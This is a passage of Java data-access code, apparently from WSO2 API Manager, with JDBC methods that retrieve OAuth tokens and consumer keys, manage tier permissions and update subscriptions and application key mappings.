result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(endUserName, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setAccessToken(decryptedAccessToken); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); List<String> scopes = new ArrayList<String>(); do { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); } } catch (SQLException e) { handleException("Failed to get the access token data. ", e); } catch (CryptoException e) { handleException("Failed to get the access token data. 
", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKey; } public Map<Integer, APIKey> getAccessTokens(String query) throws APIManagementException { Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { Map<Integer, APIKey> tokenDataMapTmp = getAccessTokens(query, getTokenSql(keyStoreTable)); tokenDataMap.putAll(tokenDataMapTmp); } } } else { tokenDataMap = getAccessTokens(query, getTokenSql(null)); } return tokenDataMap; } private Map<Integer, APIKey> getAccessTokens(String query, String getTokenSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); result = ps.executeQuery(); boolean accessTokenRowBreaker = false; Integer i = 0; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); String regex = "(?i)[a-zA-Z0-9_.-|]*" + query.trim() + "(?i)[a-zA-Z0-9_.-|]*"; Pattern pattern; Matcher matcher; pattern = Pattern.compile(regex); matcher = pattern.matcher(accessToken); if (matcher.matches()) { APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. 
", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private String getTokenSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_TOKEN_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_TOKEN_SQL_SUFFIX; } public Map<Integer, APIKey> getAccessTokensByUser(String user, String loggedInUser) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(user, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_BY_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_BY_USER_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, user); result = ps.executeQuery(); Integer i = 0; boolean accessTokenRowBreaker = false; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String authorizedUserWithDomain = UserCoreUtil.addDomainToName(username, domainName); if (APIUtil.isLoggedInUserAuthorizedToRevokeToken(loggedInUser, authorizedUserWithDomain)) { String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); apiKey.setAuthUser(authorizedUserWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. 
", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private Map<String, OAuthApplicationInfo> getOAuthApplications(int applicationId) throws APIManagementException { Map<String, OAuthApplicationInfo> map = new HashMap<String, OAuthApplicationInfo>(); OAuthApplicationInfo prodApp = getClientOfApplication(applicationId, "PRODUCTION"); if (prodApp != null) { map.put("PRODUCTION", prodApp); } OAuthApplicationInfo sandboxApp = getClientOfApplication(applicationId, "SANDBOX"); if (sandboxApp != null) { map.put("SANDBOX", sandboxApp); } return map; } public OAuthApplicationInfo getClientOfApplication(int applicationID, String keyType) throws APIManagementException { String sqlQuery = SQLConstants.GET_CLIENT_OF_APPLICATION_SQL; KeyManager keyManager = null; OAuthApplicationInfo oAuthApplication = null; Connection connection = null; PreparedStatement ps = null; ResultSet rs = null; String consumerKey = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationID); ps.setString(2, keyType); rs = ps.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } if (consumerKey != null) { keyManager = KeyManagerHolder.getKeyManagerInstance(); oAuthApplication = keyManager.retrieveApplication(consumerKey); } } catch (SQLException e) { handleException("Failed to get client of application. SQL error", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } return oAuthApplication; } public APIKey getKeyStatusOfApplication(String keyType, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; APIKey key = null; String sqlQuery = SQLConstants.GET_KEY_STATUS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); preparedStatement.setString(2, keyType); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { key = new APIKey(); key.setState(resultSet.getString("STATE")); } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return key; } /** * Gets ConsumerKeys when given the Application ID. 
* * @param applicationId * @return {@link java.util.Set} containing ConsumerKeys * @throws APIManagementException */ public Set<String> getConsumerKeysOfApplication(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; Set<String> consumerKeys = new HashSet<String>(); String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { String consumerKey = resultSet.getString("CONSUMER_KEY"); if (consumerKey != null) { consumerKeys.add(consumerKey); } } } catch (SQLException e) { handleException("Error occurred while getting consumer keys of application " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return consumerKeys; } public Set<String> getApplicationKeys(int applicationId) throws APIManagementException { Set<String> apiKeys = new HashSet<String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { apiKeys = getApplicationKeys(applicationId, getKeysSql(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getApplicationKeys(applicationId, getKeysSql(null)); } return apiKeys; } public void updateTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = 
conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } public TierPermissionDTO getTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_PERMISSION_OF_TIER_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public TierPermissionDTO getThrottleTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public void updateThrottleTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("THROTTLE_TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = 
conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getThrottleTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } private Set<String> getApplicationKeys(int applicationId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Set<String> apiKeys = new HashSet<String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, applicationId); result = ps.executeQuery(); while (result.next()) { apiKeys.add(APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get keys for application: " + applicationId, e); } catch (CryptoException e) { handleException("Failed to get keys for application: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_SUFFIX; } /** * Get access token data based on application ID * * @param subscriptionId Subscription Id * @return access token data * @throws APIManagementException */ public Map<String, String> getAccessTokenData(int subscriptionId) throws APIManagementException { Map<String, String> apiKeys = new HashMap<String, String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable 
: keyStoreTables) { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(null)); } return apiKeys; } private Map<String, String> getAccessTokenData(int subscriptionId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<String, String> apiKeys = new HashMap<String, String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { apiKeys.put("token", APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); apiKeys.put("status", result.getString("TOKEN_STATE")); } } catch (SQLException e) { handleException("Failed to get access token data for subscription: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get access token data for subscription: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSqlUsingSubscriptionId(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_SUFFIX; } /** * This method returns the set of Subscribers for given provider * * @param providerName name of the provider * @return Set<Subscriber> * @throws APIManagementException if failed to get subscribers for given provider */ public Set<Subscriber> getSubscribersOfProvider(String providerName) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); while (result.next()) { // Subscription table should have API_VERSION AND API_PROVIDER Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setName(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to get subscribers for: " + providerName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public Set<Subscriber> getSubscribersOfAPI(APIIdentifier identifier) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); 
subscriber.setSubscribedDate(result.getTimestamp(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to get subscribers for :" + identifier.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public long getAPISubscriptionCountByAPI(APIIdentifier identifier) throws APIManagementException { String sqlQuery = SQLConstants.GET_API_SUBSCRIPTION_COUNT_BY_API_SQL; long subscriptions = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { subscriptions = result.getLong("SUB_ID"); } } catch (SQLException e) { handleException("Failed to get subscription count for API", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } /** * This method is used to update the subscriber * * @param identifier APIIdentifier * @param context Context of the API * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscriptions(APIIdentifier identifier, String context, int applicationId, String subscriber) throws APIManagementException { addSubscription(identifier, context, applicationId, APIConstants.SubscriptionStatus.UNBLOCKED, subscriber); } /** * This method is used to update the subscription * * @param identifier APIIdentifier * @param subStatus Subscription Status[BLOCKED/UNBLOCKED] * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscription(APIIdentifier identifier, String subStatus, int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement updatePs = null; int apiId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); resultSet = ps.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } String subsCreateStatus = getSubscriptionCreaeteStatus(identifier, applicationId, conn); if (APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subsCreateStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_APPLICATION_SQL; //Updating data to the AM_SUBSCRIPTION table updatePs = conn.prepareStatement(sqlQuery); updatePs.setString(1, subStatus); updatePs.setString(2, identifier.getProviderName()); updatePs.setTimestamp(3, new Timestamp(System.currentTimeMillis())); updatePs.setInt(4, apiId); updatePs.setInt(5, applicationId); updatePs.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch 
(SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(updatePs, null, null); } } /** * This method is used to update the subscription * * @param subscribedAPI subscribedAPI object that represents the new subscription detals * @throws APIManagementException if failed to update subscription */ public void updateSubscription(SubscribedAPI subscribedAPI) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_UUID_SQL; //Updating data to the AM_SUBSCRIPTION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscribedAPI.getSubStatus()); //TODO Need to find logged in user who does this update. ps.setString(2, null); ps.setTimestamp(3, new Timestamp(System.currentTimeMillis())); ps.setString(4, subscribedAPI.getUUID()); ps.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void updateSubscriptionStatus(int subscriptionId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query is to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, status); ps.setInt(2, subscriptionId); ps.execute(); //Commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback subscription status update ", e1); } } handleException("Failed to update subscription status ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getRegistrationApprovalState(int appId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String state = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_REGISTRATION_APPROVAL_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, appId); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { state = resultSet.getString("STATE"); } } catch (SQLException e) { handleException("Error while getting Application Registration State.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return state; } /** * Update the consumer key and application status for the given key type and application. 
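* The mapping row is only updated when the given key type has an OAuth application with a client id and the application id is not -1.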
* * @param application Application for which the consumer key should be updated * @param keyType PRODUCTION | SANDBOX */ public void updateApplicationKeyTypeMapping(Application application, String keyType) throws APIManagementException { OAuthApplicationInfo app = application.getOAuthApp(keyType); String consumerKey = null; if (app != null) { consumerKey = app.getClientId(); } if (consumerKey != null && application.getId() != -1) { String addApplicationKeyMapping = SQLConstants.UPDATE_APPLICAITON_KEY_TYPE_MAPPINGS_SQL; Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setString(1, consumerKey); ps.setInt(2, application.getId()); ps.setString(3, keyType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error updating the CONSUMER KEY of the AM_APPLICATION_KEY_MAPPING table where " + "APPLICATION_ID = " + application.getId() + " and KEY_TYPE = " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * This method will create a new client at the key-manager side. Further, it will add a new record to * the AM_APPLICATION_KEY_MAPPING table * * @param keyType PRODUCTION | SANDBOX * @param applicationName apim application name. * @param userName apim user name * @param clientId this is the consumer key. * @throws APIManagementException */ public void createApplicationKeyTypeMappingForManualClients(String keyType, String applicationName, String userName, String clientId) throws APIManagementException { String consumerKey = null; if (clientId != null) { consumerKey = clientId; } Connection connection = null; PreparedStatement ps = null; //APIM application id. int applicationId = getApplicationId(applicationName, userName); if (consumerKey != null) { String addApplicationKeyMapping = SQLConstants.ADD_APPLICATION_KEY_TYPE_MAPPING_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setInt(1, applicationId); ps.setString(2, consumerKey); ps.setString(3, keyType); ps.setString(4, APIConstants.AppRegistrationStatus.REGISTRATION_COMPLETED); // If the CK/CS pair is pasted on the screen set this to MAPPED ps.setString(5, "MAPPED"); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while inserting record to the AM_APPLICATION_KEY_MAPPING table, " + "error is = " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * Updates the state of the Application Registration. * * @param state State of the registration. * @param keyType PRODUCTION | SANDBOX * @param appId ID of the Application. * @throws APIManagementException if updating fails. 
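* The state change is written for the given application id and key type and committed immediately.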
*/ public void updateApplicationRegistration(String state, String keyType, int appId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String sqlStmt = SQLConstants.UPDATE_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlStmt); ps.setString(1, state); ps.setInt(2, appId); ps.setString(3, keyType); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error while updating registration entry.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * @param apiIdentifier APIIdentifier * @param userId User Id * @return true if user subscribed for given APIIdentifier * @throws APIManagementException if failed to check subscribed or not */ public boolean isSubscribed(APIIdentifier apiIdentifier, String userId) throws APIManagementException { boolean isSubscribed = false; String loginUserName = getLoginUserName(userId); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiIdentifier.getProviderName())); ps.setString(2, 